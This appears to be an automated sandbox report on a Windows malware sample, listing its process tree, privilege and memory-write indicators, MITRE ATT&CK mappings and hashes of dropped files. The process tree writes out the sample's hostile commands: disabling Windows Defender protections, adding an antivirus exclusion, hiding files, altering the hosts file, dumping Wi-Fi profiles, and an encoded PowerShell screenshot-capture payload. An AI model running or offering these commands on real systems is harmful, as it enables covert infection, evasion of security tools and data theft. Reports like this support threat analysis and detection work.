1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Token: SeIncreaseQuotaPrivilege	2960	wmic.exe
Token: SeSecurityPrivilege	2960	wmic.exe
Token: SeTakeOwnershipPrivilege	2960	wmic.exe
Token: SeLoadDriverPrivilege	2960	wmic.exe
Token: SeSystemProfilePrivilege	2960	wmic.exe
Token: SeSystemtimePrivilege	2960	wmic.exe
Token: SeProfSingleProcessPrivilege	2960	wmic.exe
Token: SeIncBasePriorityPrivilege	2960	wmic.exe
Token: SeCreatePagefilePrivilege	2960	wmic.exe
Token: SeBackupPrivilege	2960	wmic.exe
Token: SeRestorePrivilege	2960	wmic.exe
Token: SeShutdownPrivilege	2960	wmic.exe
Token: SeDebugPrivilege	2960	wmic.exe
Token: SeSystemEnvironmentPrivilege	2960	wmic.exe
Token: SeRemoteShutdownPrivilege	2960	wmic.exe
Token: SeUndockPrivilege	2960	wmic.exe
Token: SeManageVolumePrivilege	2960	wmic.exe
Token: 33	2960	wmic.exe
Token: 34	2960	wmic.exe
Token: 35	2960	wmic.exe
Token: 36	2960	wmic.exe
Token: SeIncreaseQuotaPrivilege	2960	wmic.exe
Token: SeSecurityPrivilege	2960	wmic.exe
Token: SeTakeOwnershipPrivilege	2960	wmic.exe
Token: SeLoadDriverPrivilege	2960	wmic.exe
Token: SeSystemProfilePrivilege	2960	wmic.exe
Token: SeSystemtimePrivilege	2960	wmic.exe
Token: SeProfSingleProcessPrivilege	2960	wmic.exe
Token: SeIncBasePriorityPrivilege	2960	wmic.exe
Token: SeCreatePagefilePrivilege	2960	wmic.exe
Token: SeBackupPrivilege	2960	wmic.exe
Token: SeRestorePrivilege	2960	wmic.exe
Token: SeShutdownPrivilege	2960	wmic.exe
Token: SeDebugPrivilege	2960	wmic.exe
Token: SeSystemEnvironmentPrivilege	2960	wmic.exe
Token: SeRemoteShutdownPrivilege	2960	wmic.exe
Token: SeUndockPrivilege	2960	wmic.exe
Token: SeManageVolumePrivilege	2960	wmic.exe
Token: 33	2960	wmic.exe
Token: 34	2960	wmic.exe
Token: 35	2960	wmic.exe
Token: 36	2960	wmic.exe
Token: SeIncreaseQuotaPrivilege	4944	wmic.exe
Token: SeSecurityPrivilege	4944	wmic.exe
Token: SeTakeOwnershipPrivilege	4944	wmic.exe
Token: SeLoadDriverPrivilege	4944	wmic.exe
Token: SeSystemProfilePrivilege	4944	wmic.exe
Token: SeSystemtimePrivilege	4944	wmic.exe
Token: SeProfSingleProcessPrivilege	4944	wmic.exe
Token: SeIncBasePriorityPrivilege	4944	wmic.exe
Token: SeCreatePagefilePrivilege	4944	wmic.exe
Token: SeBackupPrivilege	4944	wmic.exe
Token: SeRestorePrivilege	4944	wmic.exe
Token: SeShutdownPrivilege	4944	wmic.exe
Token: SeDebugPrivilege	4944	wmic.exe
Token: SeSystemEnvironmentPrivilege	4944	wmic.exe
Token: SeRemoteShutdownPrivilege	4944	wmic.exe
Token: SeUndockPrivilege	4944	wmic.exe
Token: SeManageVolumePrivilege	4944	wmic.exe
Token: 33	4944	wmic.exe
Token: 34	4944	wmic.exe
Token: 35	4944	wmic.exe
Token: 36	4944	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 4996	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	83
PID 1856 wrote to memory of 4996	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	83
PID 1856 wrote to memory of 4400	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	84
PID 1856 wrote to memory of 4400	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	84
PID 1856 wrote to memory of 2960	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	85
PID 1856 wrote to memory of 2960	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	85
PID 1856 wrote to memory of 4944	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	88
PID 1856 wrote to memory of 4944	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	88
PID 1856 wrote to memory of 1996	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	89
PID 1856 wrote to memory of 1996	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	89
PID 1856 wrote to memory of 5048	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	90
PID 1856 wrote to memory of 5048	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	90
PID 1856 wrote to memory of 3984	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	91
PID 1856 wrote to memory of 3984	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	91
PID 1856 wrote to memory of 4792	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	92
PID 1856 wrote to memory of 4792	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	92
PID 1856 wrote to memory of 4696	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	93
PID 1856 wrote to memory of 4696	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	93
PID 1856 wrote to memory of 4676	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	94
PID 1856 wrote to memory of 4676	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	94
PID 1856 wrote to memory of 4552	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	95
PID 1856 wrote to memory of 4552	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	95
PID 1856 wrote to memory of 3952	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	96
PID 1856 wrote to memory of 3952	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	96
PID 1856 wrote to memory of 1608	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	97
PID 1856 wrote to memory of 1608	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	97
PID 1856 wrote to memory of 4904	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	98
PID 1856 wrote to memory of 4904	1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	98
PID 4904 wrote to memory of 1040	4904	powershell.exe	99
PID 4904 wrote to memory of 1040	4904	powershell.exe	99
PID 1040 wrote to memory of 3836	1040	csc.exe	100
PID 1040 wrote to memory of 3836	1040	csc.exe	100

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4996	attrib.exe
4400	attrib.exe
4676	attrib.exe
4552	attrib.exe

C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
"C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
  2⤵
  - Views/modifies file attributes
  PID:4996
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4400
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1996
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:5048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3984
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4792
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4696
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4676
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4552
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:3952
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  PID:1608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of WriteProcessMemory
  PID:4904
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5o0fhpib\5o0fhpib.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B70.tmp" "c:\Users\Admin\AppData\Local\Temp\5o0fhpib\CSC9F9EFBF77D9C43FD86747A5D139D7835.TMP"
      4⤵
      PID:3836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3PyEnROsXv\Display (1).png

Filesize
409KB

MD5
7b4ec89366deb853aef5643fe23fba10

SHA1
e3fa6b9034faac9e96176c632db951c17331b49d

SHA256
ad4693ea09372e50de483702b88923d8fbb33084aaf96a4d51529c2092e394e6

SHA512
610050b867b74c59b53ed9fcfb338b31f631af493b73c324db94477cb6b15add591abab735e558f8b80934508904c99570907ad2ea1fb02a81e789b59d5ce10a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5o0fhpib\5o0fhpib.dll

Filesize
4KB

MD5
d64f55ee00efc258f791427f1a0f6fb7

SHA1
3a70fcee6ce4267b1956d33ce4ab0c1db5c9fa6c

SHA256
cd04ace497c9824ea185acf2fc51d2355f1102fb00d557d83538b402a06448bf

SHA512
bd301a7a8be6708d29ba93f038c0873b470480b645baab901cf1a741f258fe20dcd5c8a691b3f5eddfc2a63aa87599d267508797487b09b869a0db98d19571a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4B70.tmp

Filesize
1KB

MD5
5dccb009bbb27455930c4d801b93f9b3

SHA1
be3eecfd142f6b5dd5c5cc4f591a7741ec1e6676

SHA256
6824c0cd4b33d0577e9e71b9921f8be63585d6e833d47894cc9c15e6afb7ad7b

SHA512
8334e3197243adcde9964f6a64725a0e9c0541acb517805a9cfd23671d88b49d1722f2fb88145dc3a00c4cce32a909f2d1d9e75d6312ba0c6db0107feebec823

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txievcly.mgt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
11.8MB

MD5
44d806942d0bbc5f4302867243b66a18

SHA1
4405cd3f84680d4888ef7f9fb0a651c82b3573b9

SHA256
758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5

SHA512
661aeb2b1037c1ef446056f8f71a0d4f2eba8702072b931c87604ac58f408d93c1fcb2cc04b1fceb312318361b3c88e3e94c8ab0e318e4e8a669f81950a5c6f9

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5o0fhpib\5o0fhpib.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5o0fhpib\5o0fhpib.cmdline

Filesize
607B

MD5
857e037cb3f864d57d1967470585b0cc

SHA1
737d651b88b30da0fdd18f0102237bf7f3bd0a9b

SHA256
bb7267b8d8ce585cfc5c1d4dc3510ce2d1cde3cff5ec1e6f40eeab93faa7de40

SHA512
41936a289637f51f7e357e2f46707a4421f80e084356e55e027a8b0aad9e2a2b9079a5052c1f417a07db345e4061f9e7888560223a070509c5285d07f0a3fc07

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5o0fhpib\CSC9F9EFBF77D9C43FD86747A5D139D7835.TMP

Filesize
652B

MD5
3f7647204b8ad19e51d226b49b861df8

SHA1
96abc3a90e3e83102e4a13dee2cd236779506064

SHA256
d4973483db4d10b548b31ee443c0bd98403042abbfcc369963b1647c9e435449

SHA512
01f3b3191fd352dd8e4608d480db7a80714226ec7c6252bc6efcff48197ee2d2b38b08776fad8bda00288a96bb529cd792239b039edbbdb9fc397765fd625f59

Download Submit
memory/1996-13-0x00000162E82D0000-0x00000162E82F2000-memory.dmp

Filesize
136KB

Download
memory/4904-60-0x000002506F950000-0x000002506F958000-memory.dmp

Filesize
32KB

Download